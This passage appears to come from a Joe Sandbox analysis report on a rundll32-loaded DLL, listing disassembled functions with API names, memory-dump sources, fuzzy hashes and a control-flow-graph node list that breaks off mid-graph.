                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1239891234-0
                                                                                                                      • Opcode ID: f2b76127cd05c31a2ecadb270094ed0c6689056a0af10cec6eb284afa3def46a
                                                                                                                      • Instruction ID: 905706a78b28de553ff1c072a988b606fa7db5b73e11ba1501fb652d9d2a54d3
                                                                                                                      • Opcode Fuzzy Hash: f2b76127cd05c31a2ecadb270094ed0c6689056a0af10cec6eb284afa3def46a
                                                                                                                      • Instruction Fuzzy Hash: 29315E36214F848AEBA5CB25E8403EE73A4F78D795F504126EA9D43B55DF38C259CB00
                                                                                                                      Function 000000018001EC90 Relevance: 7.8, APIs: 5, Instructions: 325fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite$Console
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 786612050-0
                                                                                                                      • Opcode ID: 00e79c1934c4a50b45bd69d51485f00fea5bd4bfbc5359d19334335588203000
                                                                                                                      • Instruction ID: a2848cc2b4c799ce440ff5b96a3b0396b6e0cbd7ead21464558e611985a9af31
                                                                                                                      • Opcode Fuzzy Hash: 00e79c1934c4a50b45bd69d51485f00fea5bd4bfbc5359d19334335588203000
                                                                                                                      • Instruction Fuzzy Hash: D6E1CC72704B889AE752CF64D5403ED7BB5F3497D8F548216EE8A87B99DE38C25AC300
                                                                                                                      Function 0000000180001490 Relevance: 7.6, APIs: 5, Instructions: 105nativememoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocLocalPort$ConnectCreateReplyRequestSectionWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4119859285-0
                                                                                                                      • Opcode ID: 3c4ded47a680b4dba9f3c6c4b85c20580f6d157d1bf03a574ec117bbe4753639
                                                                                                                      • Instruction ID: a3633154fbdd70f9f1265950c11d40fef8ef3799bcdc3cfc3739c56f6c74ca62
                                                                                                                      • Opcode Fuzzy Hash: 3c4ded47a680b4dba9f3c6c4b85c20580f6d157d1bf03a574ec117bbe4753639
                                                                                                                      • Instruction Fuzzy Hash: 1F4198B2200B4486E752CF22E890B9A73B5F78CBD4F548116EF890BB54DF38C2A8C740
                                                                                                                      Function 00000001800012B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Port$Request$ConnectReplyWait
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 3401284753-3887548279
                                                                                                                      • Opcode ID: a17ab488e79211bc0cd77551181ff08188d7113eb83031c34617cc42284ebbf9
                                                                                                                      • Instruction ID: 0b4ee39ac70773bad8c72dec1bca403db6e80d9ae34062aed01429b11a06f256
                                                                                                                      • Opcode Fuzzy Hash: a17ab488e79211bc0cd77551181ff08188d7113eb83031c34617cc42284ebbf9
                                                                                                                      • Instruction Fuzzy Hash: 3941B17621074486D75ADF22E9103EAB7A4F74DBE9F448129EF5947B94DF38C258C700
                                                                                                                      Function 000000018000D1F4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000000018000D277
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                      • API String ID: 389471666-631824599
                                                                                                                      • Opcode ID: ecc7c02a7c48d1b9bb403a0a685e52ae2bef50b807fb938a6a103126c9ec8dad
                                                                                                                      • Instruction ID: f7053bd0396e4c91faca25b0ce3bca3198b66af44fd4a3770348632d72e6f07e
                                                                                                                      • Opcode Fuzzy Hash: ecc7c02a7c48d1b9bb403a0a685e52ae2bef50b807fb938a6a103126c9ec8dad
                                                                                                                      • Instruction Fuzzy Hash: F2117C32310B49A7F786DB22D6543E933A1FB58395F40C029EB4982A91EF38D2BCC750
                                                                                                                      Function 000000018001C030 Relevance: 4.8, APIs: 3, Instructions: 317COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memcpy_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1502251526-0
                                                                                                                      • Opcode ID: f29964d4d074ff740ab5c5c4a69c71e1df2f4ab3341a8f321d23fb1440215b82
                                                                                                                      • Instruction ID: ab26540b469f4e0b7354eaa43e5dc34d3c8a3db2f2067e80026fb295d4431794
                                                                                                                      • Opcode Fuzzy Hash: f29964d4d074ff740ab5c5c4a69c71e1df2f4ab3341a8f321d23fb1440215b82
                                                                                                                      • Instruction Fuzzy Hash: E1C13572314A8887EBA5CF59E044BAEB7A1F38C7C4F04C129EB4A43744DB38DA09CB44
                                                                                                                      Function 00000001800176FC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: gfffffff
                                                                                                                      • API String ID: 3215553584-1523873471
                                                                                                                      • Opcode ID: 29b53218aada1bfaf555c88ff8f51b8c3ea41b2ddbddc66683f582b2efc6800f
                                                                                                                      • Instruction ID: d5f4c3970d5aeeaf96ee39d0bbc91cfde74807dcd6d6f7dff4054119b9e845af
                                                                                                                      • Opcode Fuzzy Hash: 29b53218aada1bfaf555c88ff8f51b8c3ea41b2ddbddc66683f582b2efc6800f
                                                                                                                      • Instruction Fuzzy Hash: FC914776B05BC886EB57CB2694047ED67A5A798BC4F45C022EA5D47392EE3DC70AC301
                                                                                                                      Function 00000001800190AC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00000001800190DC
                                                                                                                        • Part of subcall function 0000000180011B1C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,0000000180011AC9), ref: 0000000180011B25
                                                                                                                        • Part of subcall function 0000000180011B1C: GetCurrentProcess.KERNEL32(?,?,?,?,0000000180011AC9), ref: 0000000180011B4A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                      • String ID: *?
                                                                                                                      • API String ID: 4036615347-2564092906
                                                                                                                      • Opcode ID: 638f86a2e7e4d49ae37fc61a8604ed8cc7821a2d7003b1787a476158c59390ab
                                                                                                                      • Instruction ID: c53920aa58a2c5c477e4ddcd8784a66920eacb89b2f6c2551fde3878be2706bc
                                                                                                                      • Opcode Fuzzy Hash: 638f86a2e7e4d49ae37fc61a8604ed8cc7821a2d7003b1787a476158c59390ab
                                                                                                                      • Instruction Fuzzy Hash: D051F172712F9896EF56CFA698107E927A1F75CBD8F448925FE0907B85EE38C249C300
                                                                                                                      Function 0000000180020B88 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 15204871-0
                                                                                                                      • Opcode ID: 96a3d8c50637d70c3f3cb1306a56311f0dcd62ca48fcb2cbf219494e5d1037cd
                                                                                                                      • Instruction ID: 648eb3e1a3d264b868d97efdb07806848391ff1d666815d5f8bf510b7b6f61da
                                                                                                                      • Opcode Fuzzy Hash: 96a3d8c50637d70c3f3cb1306a56311f0dcd62ca48fcb2cbf219494e5d1037cd
                                                                                                                      • Instruction Fuzzy Hash: 81B13C77601B888BEB56CF29C88639C77A0F348B88F25C911EB5D87BA5CB35D555C700
                                                                                                                      Function 00000001800192B8 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9a0d511daa76b2add08b6cf1d954412bc24922615d6c72f3a389e32da79074dd
                                                                                                                      • Instruction ID: f5247d19c4a2f21f15a273300c0f248272051d6bd59ce838a4866cda87e7ddfb
                                                                                                                      • Opcode Fuzzy Hash: 9a0d511daa76b2add08b6cf1d954412bc24922615d6c72f3a389e32da79074dd
                                                                                                                      • Instruction Fuzzy Hash: 7351E232704B9489FBA18BB2A9007DE7BA5B748BD8F548214FE5947AC9DF38C609C700
                                                                                                                      Function 000000018000AEB0 Relevance: 1.5, APIs: 1, Instructions: 35comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInstance
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 542301482-0
                                                                                                                      • Opcode ID: 804d6505040ce09ed7435f6abd1abee81e87c54fd0825d30cfa66532a33f6242
                                                                                                                      • Instruction ID: 4d9a018905f81f9742fa9f835d5cd3dec3ae5fd00beb7bebe9c1c9131f8ce4f3
                                                                                                                      • Opcode Fuzzy Hash: 804d6505040ce09ed7435f6abd1abee81e87c54fd0825d30cfa66532a33f6242
                                                                                                                      • Instruction Fuzzy Hash: DD014F76604A55C2E742CF29F440399B3A1F789BD4F59C021EB8C47728DF39C95AC700
                                                                                                                      Function 0000000180013448 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3215553584-4108050209
                                                                                                                      • Opcode ID: a3e37c8392fb69789fcb670956d6be564c39cd3358dcf4f144a3246faadc7462
                                                                                                                      • Instruction ID: 4891774f674067419b98f2762e2dc0ae8d3b101d03b98106934d6c6ae6e356d6
                                                                                                                      • Opcode Fuzzy Hash: a3e37c8392fb69789fcb670956d6be564c39cd3358dcf4f144a3246faadc7462
                                                                                                                      • Instruction Fuzzy Hash: D571F575310E0982FBEA9A2A80027ED67A2E748BC4F84D026BD45577D9CF39CA4FD705
                                                                                                                      Function 00000001800131E0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3215553584-4108050209
                                                                                                                      • Opcode ID: 59054be6faeb87a9b4443c12d56d742d66833c079548067e0105da6d94648733
                                                                                                                      • Instruction ID: 3d9d4a359dfac3b61326fce4702e62f4a81a921d99a91ccf31e2ba3a7bc04830
                                                                                                                      • Opcode Fuzzy Hash: 59054be6faeb87a9b4443c12d56d742d66833c079548067e0105da6d94648733
                                                                                                                      • Instruction Fuzzy Hash: 9361B331208E4C46FBFB9A2990033EE6791A74ABC8F449115FD81576DACE36CB4F8749
                                                                                                                      Function 000000018001AC34 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 54951025-0
                                                                                                                      • Opcode ID: 64f53cc1582c5c6f9fa0a9f1e343647baf0b76f4fb76810c580d316f29d75989
                                                                                                                      • Instruction ID: 524bcd5a47e6da71deb7b20155b822fb170eeabad2dcc64ddd503bc1873ce2e2
                                                                                                                      • Opcode Fuzzy Hash: 64f53cc1582c5c6f9fa0a9f1e343647baf0b76f4fb76810c580d316f29d75989
                                                                                                                      • Instruction Fuzzy Hash: 81B09230A03A48C2EA8B2B116C4234423B47B4D741F95C018904D41360EF3C02AE5700
                                                                                                                      Function 000000018000A040 Relevance: .2, Instructions: 156COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e03d739db6423ffcc8e006e4e4d65807781c6aecac58f04167dbdfb07267b1ba
                                                                                                                      • Instruction ID: 6af9ee9013878f181c15f1713bc348178ffb3d4f2e8e94475c7dc28adbcd32fa
                                                                                                                      • Opcode Fuzzy Hash: e03d739db6423ffcc8e006e4e4d65807781c6aecac58f04167dbdfb07267b1ba
                                                                                                                      • Instruction Fuzzy Hash: 8351E4B3B0568843DB258B49FC42796F7A5FB987C5F00A126EE8D57B68EB3CD5818700
                                                                                                                      Function 00000001800154A0 Relevance: .1, Instructions: 126COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 485612231-0
                                                                                                                      • Opcode ID: c3dd02af005dbbc35606ada343e24a33c525e9539510d4980a914492448f05e2
                                                                                                                      • Instruction ID: 22ddbfb3a3317d9b8aad32e2f9d64e1308a7fd9bb0cbcf172f9f766cedf38c1a
                                                                                                                      • Opcode Fuzzy Hash: c3dd02af005dbbc35606ada343e24a33c525e9539510d4980a914492448f05e2
                                                                                                                      • Instruction Fuzzy Hash: 3B419372310E5882EF89CF26D964799A3A1B74CFD4F49D026EE4D87B54DE3CC54A8300
                                                                                                                      Function 00000001800206B0 Relevance: .0, Instructions: 32COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fdaf272eb1844347be1a48321dfbfe9aa180a2ef53fcf2148db801cde92ebed4
                                                                                                                      • Instruction ID: fdeabef4a8a2aaa41da3dbf865f29282371d157f4ae765bdeabfc42282697580
                                                                                                                      • Opcode Fuzzy Hash: fdaf272eb1844347be1a48321dfbfe9aa180a2ef53fcf2148db801cde92ebed4
                                                                                                                      • Instruction Fuzzy Hash: F8F068B17192598AEBD68F28A84276A77D0E35C3C0F51C01AE58983B04D63C82558F54
                                                                                                                      Function 0000000180005BC0 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 288memorystringCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 330 180005bc0-180005c07 331 180005c0d-180005c10 330->331 332 180005f70 330->332 331->332 334 180005c16-180005c1c 331->334 333 180005f75-180005f9f call 18000da80 332->333 336 180005c23-180005c2b 334->336 336->336 338 180005c2d-180005c5c 336->338 339 180005c76-180005c79 338->339 340 180005c5e-180005c6e CoTaskMemAlloc 338->340 341 180005c7e-180005c81 339->341 340->341 342 180005c70-180005c74 340->342 343 180005e07 341->343 344 180005c87-180005ca7 341->344 342->341 347 180005e0d-180005e1b CoTaskMemFree 343->347 345 180005f59-180005f6b 344->345 346 180005cad 344->346 345->347 348 180005cb3-180005cb8 346->348 347->333 349 180005dd1-180005dd8 348->349 350 180005cbe-180005cc1 348->350 351 180005dda-180005dea CharNextW 349->351 352 180005def-180005e01 call 180005250 349->352 353 180005cc3-180005cd5 call 18000e884 350->353 354 180005d37-180005d3e 350->354 355 180005dec 351->355 356 180005e20-180005e33 call 180007640 351->356 352->343 368 180005f2f-180005f42 CharNextW 352->368 353->354 369 180005cd7-180005cdd 353->369 359 180005d85-180005d88 354->359 360 180005d40-180005d43 354->360 355->352 375 180005eb3-180005eb9 356->375 376 180005e35-180005e42 356->376 359->349 364 180005d8a-180005d9c 359->364 365 180005d45-180005d48 360->365 366 180005d4d-180005d57 call 1800056c0 360->366 364->349 371 180005d9e-180005da2 364->371 365->349 378 180005d59-180005d5c 366->378 379 180005d5e-180005d7f CharNextW call 180005250 366->379 368->345 373 180005f44-180005f49 368->373 369->354 374 180005cdf-180005d29 CharNextW * 4 call 180005250 369->374 371->349 377 180005da4-180005da8 371->377 373->348 374->343 389 180005d2f-180005d32 374->389 375->347 381 180005e48-180005e5c call 180011cf8 376->381 382 180005f4e-180005f54 376->382 377->349 383 180005daa-180005dc7 call 180005250 377->383 378->364 379->343 379->359 392 180005e82-180005e90 381->392 393 180005e5e-180005e61 381->393 382->347 383->343 394 180005dc9-180005dcc 383->394 389->354 392->375 395 180005e92-180005ea7 lstrcmpiW 392->395 396 180005fc6-180005fd0 call 180005370 393->396 397 180005e67-180005e6a 393->397 394->349 400 180005ea9-180005eb1 395->400 401 180005ebe-180005ec2 395->401 398 180005fbb-180005fc5 call 180005370 397->398 399 180005e70-180005e73 397->399 398->396 399->398 404 180005e79-180005e7c 399->404 400->375 400->395 401->375 406 180005ec4-180005ec7 401->406 404->392 408 180005fb0-180005fba call 180005370 404->408 409 180005ecd-180005ed0 406->409 410 180005fa0-180005faf call 180007aa0 406->410 408->398 409->410 411 180005ed6-180005ee1 409->411 410->408 411->375 414 